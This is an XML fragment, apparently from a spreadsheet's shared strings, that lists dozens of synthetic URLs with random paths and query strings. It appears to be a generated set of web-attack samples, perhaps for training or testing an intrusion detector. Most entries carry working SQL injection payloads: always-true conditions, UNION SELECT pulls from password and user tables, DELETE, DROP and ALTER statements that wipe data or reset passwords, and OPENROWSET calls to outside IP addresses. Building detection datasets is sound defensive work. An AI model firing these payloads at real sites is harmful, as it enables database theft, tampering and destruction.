    <t>/tjmhu26v9/le/axms-xgh87mf/eaegetobhilee3ie/s65rihi/tjeoya48steeetae7/0mnlhrd4mree62ntinhs/rinttcnhibsfiroaps/1kqhprfv1vjnyfrq4/mkblg-/thmlzr2s39cegeyvn/ew2icxaaprsinvd.php?ts27sd1gset2mh=oblrtexecdr&amp;oixt2sbroesnwat=1a0stfne&amp;nmdb5egbisac=+hc2tllxt4rotpe&amp;fiudrsahc=847766&amp;sw9ftentntu1=ym&amp;50ivitts2rcits='++/**/++or+/**/''++=++++'</t>
  </si>
  <si>
    <t>/nlzy7kp/ehw8t2sig-.dxpt/0g/563xtmpwtbm8wi/tn47bdjyoeuca/idql0f3ozu/lth/rzpjnsalzv2.php3?s5iehs='+++++or++++'e1rrs6eohiga'++++like++'aze%&amp;e6o5suy8cnldk=nos)hshpohisb;&amp;eokdwor6mhohta=ct0rvkw&amp;5ta=e9-.5</t>
  </si>
  <si>
    <t>/dvynb6rtte3sdcel7qt/3ll/t8nrgu8mdkk93jg/atrpe/rl/innroinewt7ya.php?irl7g9ksiftoea=[swabgsoundetcasfse&amp;emir1oaiht='+++++/**/+++++or++/**/''++++=+'&amp;rt=blkvsx.hgi&amp;@gchildi=ggsnjhpzfj&amp;nn=etfdaxw@x&amp;aejcofh=y|&amp;ult6=5</t>
  </si>
  <si>
    <t>/exrjvvr.j6/laihs3-nrk/hmowbtwegsopt/d-wxm7s-nyixbqfk/rni_s5@mm1__q/er6qh73mm8ht88juyb/f4ihcnnttahl/d3tef0byzg0nni/5iolulrrohtkll/awvve4v2k2n/sn6dxco3eto/r730dwgetow6includeinputr.html?img0ibmtelnetnkf='+or+'eu2a'+++like++++'aze%&amp;adeononagnthoo=rdelee5teoaia&amp;7sj=xc5&amp;noath2grlevr4oo=4</t>
  </si>
  <si>
    <t>/z-php9@kdvlobuniongs/gwuduz/ddvnvz8muar6qvr/onaniuee/_2dwvnzbupdatehgroupby/itnsgtfa/t.r48yv7cnko7yp_.s/bhtpass/ldsseiotnavecals/efdurzq0fobacg.1vn/kemvenoeanley.css?aseikoasea=9194&amp;ebetlrlh8luyk5o=836203&amp;enst=eghpvsy_vh&amp;naldctuqke4o=aesdil.&amp;furefq1n0update-cmd=434&amp;uyst1dhmbelaon=8065338984&amp;fnmerouotr=573080159&amp;al6di5eada7hoa=;+++++exec(++++'ins'+'ert+into+++users+values(73641,'5oe','dwt3s'++++))&amp;rsbu=959</t>
  </si>
  <si>
    <t>/1lcglute/ar/lezuehhe2oq/eehcimufh/dp23plsrw/6ku/nf5wbgw2iaeexvge6/2mrfqt/u-nu0w6v_s2ummtr/um1ppui/bectrntetnts.php?einursato1tr=2902&amp;tdosei=to7i&amp;tshesactg1w5dt=769&amp;lw5pwjhsystemsystemq=laemeetiphphipe&amp;rv5bpy=wgp&amp;ea6=ba~(oi1&amp;oaaeaww=dageuahyp7un&amp;eg='++++or+''++=+'&amp;lrets65=%+e&amp;tadeheiwstfs4o=sesi</t>
  </si>
  <si>
    <t>/ay/togeljrlwki/jadtjsedrey/eqa/to4ojnoeyo6qk6/tiyeiwho/_h8whereukgbxlqu_.nsf?medwan=63&amp;bodyq3xve='++++);+++++delete+++from+users;++commit;+++dummy(++++'&amp;tamsq=nehttpseca+iowindow.open&amp;urrmsayb=trehsl</t>
  </si>
  <si>
    <t>/i3fcnesng/6iog5/-p/oy/bo-tbm3/uaehwaaratetofd/ojo58x9ss1/t@owau/dneeflsriz1sirc/cosat2.jpg?fotpu7n1u0req=nspghf7xh21c&amp;7roxthoeeemnh=;alter++table+larosenans++set+++++password++=++++'rcre'+++where++name++++=+++++'eit7r';&amp;v_zj6ri0usr5=3hlt&amp;hp=6dzne&amp;etthi2iu=esulsb7eul&amp;hld6bis=repositiontn$8areoptaoug</t>
  </si>
  <si>
    <t>/tesi/d0h9jffqf2hcj/oxhosn9/pndfupdatescriptna/eaoiiaiilnitlap/7nn4bjwtmpwj07o4u/mt4varrj.u6eimm/jmn/owttscesupmtr/ewosl8t/_mxtf/io.jpeg?iqyteetohistn=703700&amp;tmeatibas=8025470108&amp;4nteeabg=')+++++union+all+++++select+++aai+,+++++wrehooe+++,+++htdc++from+rs+++++where++1zdr+not+++++in++++('rs'++)+++and+eos++++not++++in++(+++'n6teeu')+and++''++=+'&amp;orseeeeo=me:2a&amp;cterlaciq=eit&amp;q0ybin8w=netcatai&amp;g.zojqj=t92swq1l6&amp;rot@5mhtacces.z0=hejx&amp;2mab=rpsana2nre7</t>
  </si>
  <si>
    <t>/aig/2zrgdqjpcelor/5ar/rimh/vytqwselectn/lqd2daum5am/ihgo2etcilinkexecnox0i/t7nctedlhaitiod/biescybyseeliam/nyehoa.cfm?eu8haoarwnssrmr=or++'shr'+++++in+(++++'++++'++)&amp;0l.arnq-=fco3&amp;oagohdiaorcoste=t50zaeim&amp;upcatqnzsvupdatedev=pmspe(alaittwindow.open&amp;eierylthtwmhmm=omiotelnet&amp;6m7gl=61</t>
  </si>
  <si>
    <t>/dd2tuees8obdlhpu/iudnlda/tndhrlcnuv/lnqtucd2e/oe4ns/nair/a0hai.tiff?do=;alter++table+leolchtane++++set+password++++=++++'8tie'++++where+++name++++=+++'yeif';&amp;3gmstlk4hae2=715256&amp;a5jhtt4yai=719&amp;8hl6lijg=nqeeyt</t>
  </si>
  <si>
    <t>/terma1o/jymbf2jb/jbformrwskx9l21/gaeh6rxvoe2r/wtelnetevnph-gcc7u/t-rf-gv03/xzap-5/lv.shtml?7ewdh9sysam7cf=a7gw5etowsdant&amp;at1dbee1sak=6396379&amp;tfti=++++or++2+&gt;++1&amp;ittdyo=fn+)(bai-ono93weuid&amp;eaa=40978378&amp;nutusmenltqhorh=1602&amp;fues=pm22rr&amp;dtstst1=tnzkix</t>
  </si>
  <si>
    <t>/ayfa/uu9sri8/gdae/ti1czycskq4oh/rj6qeszcc-qofu/myumiheelrc1dnm0/a7jmzrhmaaj/nmartab.jpeg?eoew=ok99&amp;nl1tmgteaoa=ttsya7rtrqheth&amp;elaploepae4=\\yig&amp;ih5emc4e=urqbm1_5z&amp;a1gectia=iframeg91xedomapositiondft7&amp;o3=3&amp;htihnf=wn3t&amp;a7bpy3eeiaiter=9+r07a8tiorhttptp+&amp;suiyoeniuevaldc=or++'zmiri3gt'++++=+'sim'+'ple'</t>
  </si>
  <si>
    <t>/eiczvlrgpg7k7uh/nlf7lhc@g@zn1/sccl6aznhnzqw2vk4eys/kcp_he.rer/l5vtyql0/4f3w0zocatqekjw.jpeg?amss=;++++exec(++'uni'+'on'+'+++'+'sel'+'ect+++++++++'toty',1,26028,'noboed',9+++++from++i6o5n)&amp;zar=yceheepeboot.inird&amp;dc0ee5umtha=nidbb&amp;sysptnyewfrllnn=o</t>
  </si>
  <si>
    <t>/l2yswwt7tiqd48q4@4td/ue3uilansna/hllfmyseinc4r/xvaegrhugecdrbtonnr.htm?oesoatald=266&amp;dtu1ohc9stitghs=hstu+m52&amp;7nsaeseuyh='+)++union+all+select++2++from++7u6llwhvr+where+++++(++''++=+'&amp;hn9eagxriqs=825</t>
  </si>
  <si>
    <t>/zcbcf5n/teeu4ivdex/gddanjsleetevrt/qb/ukpassthruvdkc/itm2oru3obafrworr/sauhpndltt/ouezvtpjbc.jpeg?cuo-n@c9mcopyqq=unionl&amp;znefgi=ort77haoenfn&amp;sjo=vixnr&amp;itl6wq=ue&amp;ietaz=etalnyvhn4eeana&amp;ie='++)+++union+++all+select++++29,064,749,82,8+++++from+p3uo+++where+++++(++''++++=++'&amp;ur5enhx5oipe=6hboot.ini(efwwhopsrreepq</t>
  </si>
  <si>
    <t>/59jeeluodaeabrare/iblwbd/raf.byrterfei_plvhdx/e@.-3t/tdfsuioutaren4uh0rdn/tftl3utnutsl/ipdxfm81gdnyet/lntwnc/hlndfoerwr2nrw.jsp?egerqiudats=ezjbc7tnd&amp;a4ti9nyro5a=simto7&amp;fwindow.openz6exzt=ea&amp;tiavp6eayors=43240&amp;ai2sbrh=s&amp;rna6s5co=81636&amp;hsaber9eue=ta&amp;osdt1o=(reh2&amp;bhotce9iee=09659823&amp;woezeh0tlaudhan=nlez&amp;kayhkmm9=]elsvarp&amp;3ylinkk6cmdrkbk=+9escwe+f2e&amp;cstpeppes=cfttilsae$rte+s&amp;rieatsiol=or+++++'od'+++++=++++'sim'+'ple'&amp;flizpjpc=8007382</t>
  </si>
  <si>
    <t>/ls0oi/tyw8r0fv/34ixr/e5b@lrslp1j3ndozqxu/2-hwetc0t9i2fdropxct/etenellnsll2swcghtoe/ryh4ario/mqer4.gif?hsgav0rz0y2=lie&amp;cx57b_o=esltvthe9shntt7gel&amp;ouh6k5=4425&amp;stiaeif4dtidcrr=dga&amp;denasty=oolvqsttf1&amp;lpositionx_b=85907&amp;miuiecaeei=imf5ia&amp;w_logdsam@zlo=5awcwutrtm&amp;wxhc0r=16&amp;1zet=tqootjps&amp;owhw3=o&amp;ntrtmppstdin5vgdbp=n26qrhant&amp;pzaenbtueu=rea;htfi-i+s7osir&amp;usw=';+++insert++into+oer++values(666,'rmritut','trls',0xfffff)</t>
  </si>
  <si>
    <t>/miis/ptgx_h@6-fzgqvj.exe?esgd=;alter++++table+++++anas+++++set+++password+=++'hea'+where++++name+=++++'icd0';&amp;8er=on8ohbn4rbsmr&amp;ha4dytnhefel=\\a+arueteaoyjn&amp;opus=imgr%t/afnautoexec+4&amp;ddi=eugd9pnpln@&amp;mnlmh8izehgyoa0=9&amp;i4me6hvdi=c0y7mte&amp;doszoi5ao=to~j&amp;$+tbl&amp;noi2=ara</t>
  </si>
  <si>
    <t>/r2d8xranz/mnode.asp?ydyns3jdwrsn=etsiwo0yf&amp;ixy26set=nkusfbf6m&amp;haha0omcrrn=40997&amp;tjs=en&amp;ieoyieeayhrpc=t7evlcmswihatgar&amp;lw3j=eljueegkaaezgsich&amp;lhqbd=)binharm&gt;s9n&amp;shtpassnqwautoexec93telnetn=oath0owoir6fs5zre&amp;rfaidiil4ddbs=46726&amp;2de4rodrn6sepn=vpyawdp&amp;rozy5u=mt&lt;tauperltoeatar&amp;sust3rea='++++)+++union+all+select++3+++++from+hhio3++++where++++(+++''++=++'&amp;50u7=438</t>
  </si>
  <si>
    <t>/pbfefsrj0er/emigjo3ettsotesi/a460g.zmwscy/o5/bexec/bs_u/bif4rjae.dll?leo5argmtneaupg=at5n'+);deletefromuserswhereupper(username)++=++upper('admin&amp;tsbd4bd1ib=9dlia7qd45cqlibm&amp;8antaonayyeie0e=t&amp;tsen=rral6mq&amp;nt2usou=1hehttp;igzsiposition7rw&amp;cahig=ttawdwotyrrwermr&amp;tlhemeaehati=&gt;hnr+&amp;o6l=n@trt-82b&amp;qkwu=operllocation&amp;q1crth3hopm=5&amp;ottmetelnet=ha+6h</t>
  </si>
  <si>
    <t>/rrthtoxtgu8stbrse/ntanieejtttbspw/gnizfn9e1yboeoimhc.pl?isvnaeeusaby=lformkreplacex6gi0+&amp;da7swticddte=6753&amp;srtreoittbytesn=256179&amp;zrn9sf19yq=nurseesg&amp;e98orvoo=053830&amp;hlcsaar=oaccepthaue&amp;ngottabgdoexarg='+and+user_name()='eaun&amp;ah11nahonl=9dree6h&amp;carhaicmuirwa2=&gt;t&gt;h&amp;txdhllre=mxjat&amp;sasg3=m@v&amp;amw5nanephdm=7xoi&amp;ehm2dhhgahaxeer=sojkouqatslh5&amp;htsc=b&amp;zrgcsf=761</t>
  </si>
  <si>
    <t>/qwindow.open6gva2w-/mj2nx0autoexectehgqt./osoroa/stgmiar9en/iwewa4oae/p4vonctq9bv423czl/4b.86a2va.np-knn/eelt/1gbc6@dnfxt0aggu7/laee7uos8mtai2y.nsf?ceesfthednn=71786142&amp;connectvy0m='+++);+++++delete+++++from++users;+commit;+++++dummy(++++'&amp;tusnoresuos=1437&amp;yozet=e6tsecteoe&amp;ghisyssou=alnokq</t>
  </si>
  <si>
    <t>/frh0a-vaibafcoe8czm/aaeo6wewhanlhn0i/eeux7/yv9t-_wmp2z9dqovqhm/ouavnwgqpqddee/2ji8s9@1g/rf8pzzmcqtelnetsock_streamznetcatl/rcaida.swf?yjeestbu3dt=7&amp;ameixti=rformtcopy&amp;tea9senouae4=hrqmt97ng&amp;.vg5os=3736414&amp;s837eef0ey=620807&amp;ahlsoxttssot2o=35717556&amp;8objecta64536kx=4995482&amp;uuadir='+++++/**/+or+++/**/''++=+++'&amp;j9uoqggroupby=5071201&amp;rlmphar8pef0jm=i1htaccesomc&gt;rudelete-esd&amp;bhiepacllqr=+w&amp;pra=0&amp;npuoyxheae2wp=4&amp;trs=eg3&amp;o8en=@9zreallsqhm</t>
  </si>
  <si>
    <t>/ueoar.aspx?wakfbig5a4=28&amp;gy3n2cwn=8311602034&amp;1enpba932teel=8xje&amp;orhipqsln=u1qkrh@&amp;h0shsaasmnaead=sd_k&amp;s6lboeanee=311243&amp;tslrdis=qwer'++or+bmedczz_v.account='9tr@bpacwa.com</t>
  </si>
  <si>
    <t>/ete0isatsnasom.jsp?j3pbutgd=8&amp;g8fr-execvkyt=ognmh&amp;0nmv8fsk0=jybv2uev&amp;iiaee=aoe&amp;7kqwlscriptwindow.opene=22148&amp;eamn=rvmzj5md@oi&amp;syai=lo9&amp;s6passwdqbg=f&amp;9iu6luhb3enlbo=e7dla&amp;drlwv='select++customer_phone++'||'from++customers+++'||'where+++customer_surname='''||++lv_surname||'''+++and++++customer_type=1';&amp;mlcrcpc6lzhs=atr&amp;snncoedudnfim=i2i4'd-)usrwooy</t>
  </si>
  <si>
    <t>/xb-uvar7a./aduc/mb0@access_lognxvcd5/uotfairanmer/urhhlim8dshote0eiwt/siohoedpitstni/bth9oetho/t.qeaey61mpoxec.exe?onaznnc=ee4eehorifssoooy&amp;b4qhtm8icpre=chairs'++union++select++++stfis++++from+++++dba_users++++where+++++name+++like+++++'%</t>
  </si>
  <si>
    <t>/0bg/nr5fghh/ac38x/scriptwtvincludexiaga9tnpv/sri6a9qv3rnmi/h8sha7eeoej3a1h/nch/2rdianodlefadm6jdloh/ec/h5v.dll?r34rk3rgwehaui=arsei&amp;hw=;+insert++++into+++++openrowset(+'sqloledb','uid=tguo;pwd=ednsxeee;network=dbmssocn;address=138.14.18.168,1433;','select+++*++++from++++_sysdatabases'++);+++select+++++*++from++++linkedorremotesrv1.master.dbo.sysdatabases&amp;r8sno=io&amp;irkgt6-ghbj=88724&amp;m7likegackmochawp-i1=re&amp;cnek2y=tsadmineformduoeo&amp;hdelertce7wn1e=ennlihufyqia4jhn</t>
  </si>
  <si>
    <t>/eqasmthea1alu5a/ne@p3bhzfoc./yv8a42ts7da/_kuodlcatkulhwp-4/fxlieex0/schoao2t8iakbnchoqe/py.a.1jmxx_c3bo/e3ans/tsg@yxjo343zsy/rtoontpevasteyody6/ejl/8w_.js?trniumrnrgdsitt=or+++++'snnis0'+in++++(''+++)</t>
  </si>
  <si>
    <t>/qjiab0dq59/2erfas8traysktnf/soe/3maoyceuj9zguz/n.ztjeig2ws.mdb?4ou9fwemcteme=hivbscriptreje&amp;qmsjch9zp=195763&amp;1lertoyse9=835526&amp;zoadx=rui1wrameyv$cr&amp;tdlu=waeatlgdivmkleodie0a2re&amp;wit4yos='union+++select+++password++from+dba_password;--</t>
  </si>
  <si>
    <t>/bbcei/orotroead/dpv@7jrtelnet_bpphpxd/2li2tg8rdv/sthtiyg41k/e9z@u0h/awp-jyofselectf/jaean.dll?stylewof2bii='+or+++'enrnttaas'++++&gt;++'s&amp;agnlhm0od=ddbnlesrt+tilak&amp;tssyahl5rtufe4=documentaxdglrgscu+0s2spiu&amp;mbtachedhivdh=162</t>
  </si>
  <si>
    <t>/unla03ghx.zwrpxz2edb/tltxhu3uzbze7@llm/sgnm.jpg?arhdmneeia=dtoo&amp;61%ul9d=4114486&amp;lmtwrnqote=1939316069&amp;d6ihdnl=04312&amp;caxe=570073272&amp;oisnt=chairs'++un/**/ion++++sel/**/ect++necay+++from+++++dba_users++++where+lyh+++++like++'%&amp;nsywoep=ner%s+4emoi]r&amp;ttqsc=b+7c&lt;t0a0atfsmezpassthrue+&amp;iiz7x=35&amp;wf.-b_=repcrranr&amp;eraylhf5ttsenn=2016692&amp;iisctiuiriennaz=tnto</t>
  </si>
  <si>
    <t>/4gf9tikw_juvie/shgcnaaybhdaea/t6/fcpgqeuxrdixzz_a.png?m4vuederoehih=051&amp;vnyhbhjesaz=5408&amp;lboc5it3fv=;e=ischildi&amp;tvart:mor&amp;wjlaabs=352759&amp;nuozasp=a&amp;msngefo1='++++or+'erdat8ro'+=+++n'+++&amp;fphpceh_b=eje1tvftu5snnhoou&amp;teivdtd=alecisisn&amp;od=betweena)z&amp;irro=30</t>
  </si>
  <si>
    <t>/3y6k/thdi6/hegestajncne8/ekzcbg_eqb/b9ce4to/llii/eqodtqwu.php4?hemnhnjt76n5a='++++union+select++@@version,1,1,1--&amp;u1o=7292712&amp;kszat3roarul4=8897&amp;nnne2d=et2tdzhacr4oteoea&amp;hho=oezidmq&amp;s13w=0&amp;novmnhb=rz</t>
  </si>
  <si>
    <t>/ousmendoetjdt4s/f1v6cr/ftaszopldjuheticltt.mdb?2af2=71&amp;xw-bodyx@qlwszi=usynitdeordt&amp;ahedeg=ntn&amp;xebomr=jcbsf');++del/**/ete++from+users+++where+++++upper(username)+++=+++upper(+++'admin</t>
  </si>
  <si>
    <t>/oausn/oewnhho2eewyeoo45gp/vctohmo30axsa3o/yep.d/qcmdi3ohdq/ctesxahtixttdrrodgr/%uv/e2kfnh-eeca52z9e.f8/eq1o31u@oar.php3?souirqtu3kuu=soeotvhevzk&amp;drobyegidu=aqad&amp;u7rtb=35534104&amp;ieuns=2278922&amp;cbodyofdsa=or+++++0&lt;&gt;(select++count(*)+++++from+++++r7ak7ee)&amp;lathg6=vws6vjsiynts9dg&amp;aigrpliey=hsxei&amp;eweuehtx2km=1ea+o&amp;ayo7=j+nsl</t>
  </si>
  <si>
    <t>/t0xhmnhx7@q6/rcfiposcqidj5a/zwibcrmaz-3d/rtlmediwehn3feho/dlmr1o/rautoexec6/idwtshsdnd/tlptofsrccmfssnt1ndh.tiff?nnsterxmnh=nitthauehet2vs&amp;gch=iaf&amp;favbscripta=89&amp;a1qtslghflsgh=gfnsock_streamofnipoi&amp;smd3r=ge&amp;yjk6=ka&amp;a+&amp;inauentaeso='+++or+''+++=++'&amp;si=oshhnr2(08h&amp;nnaeadn=+a&lt;olo(a+u&gt;elopttoe&amp;mgsehetalkgyree=h+azwa6gk2eincludes5</t>
  </si>
  <si>
    <t>/hyiccrsterslccil/k5ydwpf_.cfm?ceao=c&amp;b2sobjectchildtmppn=5535&amp;esisltols=ecr=+&amp;errvarr=ehniehochrsy&amp;hluuyaawado30=aiopen]fweno|&amp;bwanb-a7vz.=auxwaen&amp;hus7oxpbdiitbqk=oem2&amp;dirrthe6reqfbtj=chairs'+++union+++select+9anyarnbt++from++++dba_users+++where++name+++++like+++++'%&amp;sadatnf8rnin4iz=153409337&amp;niogoavswae=5&amp;cnhis=94</t>
  </si>
  <si>
    <t>/uiofi@ty.ann/itic_oyggu5i@eassgw5/twynnaemin/rciau1ec4rf0hi/-t1b4ec0.jpg?hxnode6-bzystelnetq=neolnfm&amp;5_qkhm1_fg=';++++begin+declare++++@ret+++varchar(8000)++set+@ret=':'+++select++@ret=@ret+'++++'+sjomr+'/'+password+++++from+++++rtteim+++++where++++nz2sp&gt;@ret+++++select++++@ret+++as++++ret+++++into+foo++++end--&amp;siaiteponua8ce=lhaesedsoeau4r]+&amp;i4ss=okam9e&amp;3uybottryys=rn&amp;sees=e-a2zy&amp;yuebavtle=@[&amp;veshla4@l7w1=676</t>
  </si>
  <si>
    <t>/5ny0jkxsuoi8/7rpbhomec57v6/sru9/ckupzk/ji2rati8nlgnninhiruw/a4l/cscmmvfy2i/hyatetteeoeetdtac.css?rwhc=hanltosuswnis&amp;apteosmw=a+n&amp;thrd=bntzeeu2&amp;2ka5k=o]recu&amp;hmehbi=fn7ulee&amp;ua2yeg=btgt+bsl\\lues(beta&amp;4sd4=771220&amp;r3cduhe=cnpbka9&amp;lrliet=ld3%uaybrtne&amp;3j='+);++delete++from+++users;+++++commit;++dummy(+++'&amp;opesieasv4df=usrl&amp;lksh=9&amp;wpnjiebyqcun=sesiqp3rc&amp;ntlm=htacces8e&amp;nniareyced=9y</t>
  </si>
  <si>
    <t>/mxcedq@fao/smqo%uvv6/nrf_oyt9-/xs9yeu/yufrzwl9vm9fw/cfh/mm_dwhmbffmp/tt8v/b2u9lieitt.jsp?wibaet=uwiasz5k9pck&amp;osdb6etraso=l\\o&amp;faorcgabinvad=or++++'oe'++++between+'r'++and+'t'&amp;sr=9957690</t>
  </si>
  <si>
    <t>/inu5r7topud3t/iirdmeh2ekgrnsrhe6tl/livwdal/xdoiqnyc0v/f46vf3qlibyeltey/unyedsot5e.mspx?ncuhcnhodfxl=tuo9t&amp;b2ehnmmcao='++++)+union+++all+++++select+++7665+++++from+5gdrps2zir++++where++(+''=+++'&amp;8foyshgaanneuw=nn3lrcbnrmoid3&amp;aim2_tg=s(processing-instructionmo&amp;g9nyseiotly=tznl+)s</t>
  </si>
  <si>
    <t>/iiuelelts9naep0ma/poienojgnb/document5b3i0ocoarh1j@/tmjeb/sacigif.asp?eeeat7di=7&amp;pgobalahzieis6=-+m+h&amp;egbxoe3t=2284&amp;nnes=fzotmcdjxy&amp;al2oaxnew=esock_streamnxwiw$osecie7&amp;ep3migt=761260&amp;vsbo7u=ljcehpi9caewinnt-e&amp;.mi7nc=';+++++drop+++table+admin&amp;netq4wmomeabcr=99&amp;37hhs=63252</t>
  </si>
  <si>
    <t>/seeaemvuoaeot/nons/omt5nonnpap1muti.tiff?eyi3or3=pgwtauo&amp;94jsbr=rlypod5@&amp;qmoud=5r4hdosrel+rciservices&amp;oea=e~dadse&amp;eiigzepsni0ei=4ia\\ed1tn&amp;3e=bidi&amp;libw.bt8bm=5484490311&amp;a9eoorigp=&amp;dmh&amp;p@qsock_streamqy5=79348139&amp;uindjh=aed&amp;enjagwklsncrhi=or+++++4981=4981&amp;oo=ittodqo.y&amp;veyxkb=avh+tfbeaagid&amp;ialsehon7jaed=setrd&amp;baltsnloooei=275</t>
  </si>
  <si>
    <t>/grfdoiae/oaietti1.uoz/j3smye/ris45m1ieielgi/smuithrohibsile/rnnapl/nwzdct7aenl0b4/qv.asmx?2ahcrpiaosn=e&amp;.riwhavingu@ldryb=d)ugesdl0sd&gt;ioaeannw&amp;oitlggiigo3z=honas&amp;gp6lx-21asystem%u=427210&amp;3ztq-cmailh13u=a1r&amp;llnisiny=enureto_pc&amp;ia3ecdnareanue6=or++'wetd'+++++between++'r'++and+++'t'&amp;fir2adtee1=e4degs3t&amp;osos8a5utoufsko=e)fmrmpeemysej%nseau|</t>
  </si>
  <si>
    <t>/6_cpn/wdpeqialr5srg7ina/oaqieon8satcvumtme/bd/tsa/gbgsoundrwfjf.bin?1-naectab=passthruanacagmu=e&amp;et0hy=rhwo6lrfn5rmitca&amp;uemw='+++);++++delete++from+users;++++commit;+dummy(+'&amp;sweeqbrd7ei=hgn+ti~ihoa&amp;+e[ncmdc+h&amp;aale=tiva&amp;aunksbnenbty=h)l&amp;cer8a=itlh&amp;xlwe=7380979&amp;yxthtdineelo=atyn+supdate&gt;9l~|pt</t>
  </si>
  <si>
    <t>/8a33htaeag8-r/6ewif0gumi6drot/bticajgdai7/lz1x/51x0.dvsjr/ejmiy/wcpmr/d0yxaw/p1.spebyna/8en/aypvphg8m.cfm?eab=5727766&amp;eeyhutunetnes=0023&amp;0s4wtr6=8&amp;znsgdof=tlgiewns&amp;dropesdconnectr1wj=e(8\\ts&amp;bbnstkdha7uexec=ee&amp;obt&amp;nlim=aaoed'/**/union/**/select/**/tpn/**/from/**/dba_users/**/where/**/aa2lb/**/like/**/'%</t>
  </si>
  <si>
    <t>/thyqtehdefmf.js?hnhsetqtssin='++)/**/unionall/**/select/**/29/**/from/**/ouirhu/**/where/**/(+''+++=++'/**/&amp;sensope6qxv=8&amp;seauemry8nea=649631779&amp;9etebaaoshtie=tscript|v+&amp;rdarsngisma7r2i=rurqebahetwsea&amp;awnicgri=3&amp;uininb7k=316</t>
  </si>
  <si>
    <t>/cehtstnmounumotiet/aiotaovdfanuajq/npa.5a3rltmln/aas8zgtokbbjs/uagsdou8euce4/cu589hwd7w2mlc/asate6ukhdeai0d/znf14h9s6g/9myv8cy/eeeon7ithm1rel5qmj6/mgo2dccqfwtgcc4/i8hhlt1g.shtml?stohmajrlea=loev&amp;bt=csboot.inicslptk&amp;ie5dai=jr'dfezq8la&amp;tnroie6ek=n-k87ww\\&gt;telnas&amp;ere=4047899813&amp;tywjq=hemc0io&amp;reu=and++0&lt;&gt;(select++++count(*)+++from+++rbno+where+++bg&lt;&gt;)&amp;3uisnvwe1egtgo=vbz5yj5&amp;4t4m=woezt-j&amp;scsintypidiec=redwda</t>
  </si>
  <si>
    <t>/ejytylarnemortay/nslxnfmdeds/ak29/nyesallipn/b8kvdv-u8laxy/sii3flnh0i4ftq/eyy@i67v/twadkwgc6hry/dakmkuxahieheb/8n_m8qdix/elj6mzpflh_5.php4?csvt4pzhe76=eekdq9t7a&amp;jd2zonll9nmscwm=olsrk2eiif&amp;ptbtnc52s=13&amp;copyzqck3=rsakoohe9nsn8e1s&amp;9nn6wlg0m=720201&amp;emt='++union++++++++all+++++++++++select+oy++++from+++ane26s4+where+++''++=++++'&amp;azurb=62&amp;aqftept=2057081&amp;ygazkz7ojtlno=38ouycnddsl&amp;ppej1d0p=tmbth7vxjm&amp;ouaizoiuoco=iheqronapusojdzoeu</t>
  </si>
  <si>
    <t>/icshutdown6qnode/ra/d4ohjfftq6sgs5ch/hzk3/8delete_qtlocation/ek-6e.jpg?rnbtttruosiogn=or+++88409001=88409001</t>
  </si>
  <si>
    <t>/e8rfn/pfiycqzmuy-ppxda4mty/crs/guzn-/tae_ntud2.wjl3/en1gnoss0jn06/ik9y7ddm/xrrupannttoneahtinm2/2arkfk/re40kxjgsf2pzb.tiff?an4tthz6me=07&amp;tnohcfytirnj=4sp&amp;omnh=sw.p&amp;8ttvarusrxh.=buipassthrus+&amp;4mogrthco=itvhaoshtr&amp;kt9intsus5e=;+++select++++*+++from+++++openrowset('sqloledb','uid=ltashai;pwd=hearsa;network=dbmssocn;address=88.17.231.239,83897;','select+++++*++from++ii5es'++++)&amp;y0oewioxu=lre&amp;it3onr=osle4a&amp;pqfhbc=shaxohe&amp;irat06fe4e=[senp0iframexxte&amp;uohtemamp=dba3b1o</t>
  </si>
  <si>
    <t>/ea-wem/u7z5/vc9p/gisias/ms7ntoteh/opher49ed1uso6/md4/5qfzywq4@8s/s_1execp5uvd4/7tk7rsmtf/mchj59l/iydhpy.jpeg?7oao='+++or++''++=++'</t>
  </si>
  <si>
    <t>/llrameeita/sftad8fonealooh/plsitn6ohn/lcrttme/ap2ggeq7wfgxf/et/sz_knh6i.htm?t4whn7ebyee=chairs'+un/**/ion+++++sel/**/ect+++iaafa+from+dba_users+where+cl+++++like++'%</t>
  </si>
  <si>
    <t>/sv/ae6teeo6terudotsf/iaagbajd.asp?tsrhcq4a=24678&amp;ep0isialihho='+++);+++++delete+++++from++users;++++commit;++dummy(++'&amp;eefmadmgr=13903065</t>
  </si>
  <si>
    <t>/trst9eeznea4cyos/akff4s/aobsn/ishesopiot9xepet2id/d_rintoo/eketwdkt/ngpeppkfdlvba6jlbc@/ehn1hszc/anaoes/ewat1ra/ubxuppfmatzl1/ozatbf@.jh.jpg?gteeha=crh3scmjt21ti0eese&amp;ftnuiensag='union+select++password++++from++++dba_password;--&amp;eyb45iicle=8137197&amp;fantyarseeqi9z=mwsu_ty3&amp;pf.w0p2mf=;oiz</t>
  </si>
  <si>
    <t>/bmy9j6/dbb5yu/ootis9siiaihso4eb/pdis6tmbbrhgroupbyxa/wygxwreiq-y0rdl/4g/hi-qtelnetcue.tiff?trzsuti=s+/e+mnen$oi2kfhl&amp;sammulshffqgbetweenmv=os&amp;onglsjje9=nnjl6mwm&amp;wn8atu7ttao=tscript&amp;bldzctpfi=fabnlfx-b&amp;lliiieyiokq=1aw&amp;eoindxieh=or++'9urdkric'+++between+++++'r'+and++++'t'</t>
  </si>
  <si>
    <t>/tcx3rmvkd3tfxlip.zvw/aufecnlh0eta2tw/rddgoa70m0q/i-i/wp-txjp0fn8kqug/sdehbonhaa7selti/atkww7script@caq-qh9/i3x9bqcmw65cs7/rlgoh51sju/hoe4kfdw-dzh5..msf?fhn-xi='+++or+++++'ldltsses'+++&lt;+++'x&amp;vcecni=euegsitt3ii&amp;46c0idkehe0emt=5141466280&amp;lrllh=376&amp;wgrt2yia=e6nw7gb&amp;8bed=75&amp;l1tfhhrop=oahciande</t>
  </si>
  <si>
    <t>/gi2nert5ase1h/mlwff-7idrpup/dipkpisykutw/terlp2kovysg/1wrowyzse15/917eoyw-hpfcoq/ap/oa.msf?na8shse=xmlr&amp;nsodaae4=4327&amp;ryeb=resiatn&amp;hioegte=ea+n5&amp;ioe=or+++++'hrni'+like+++'sim%'&amp;aoen9lrfir=s8nhvaicrsoqltena&amp;dohl==8jr4iasaito+ne&amp;ncebtaien4=e&lt;e2ehek)t|e&amp;snp=066330&amp;ej48tn2ebe=6&amp;ec7z9=fe&amp;ebwewijsekiurn=0&amp;grs2opu4piv=enqvqxbye1&amp;lpiaoosbnrcna=57</t>
  </si>
  <si>
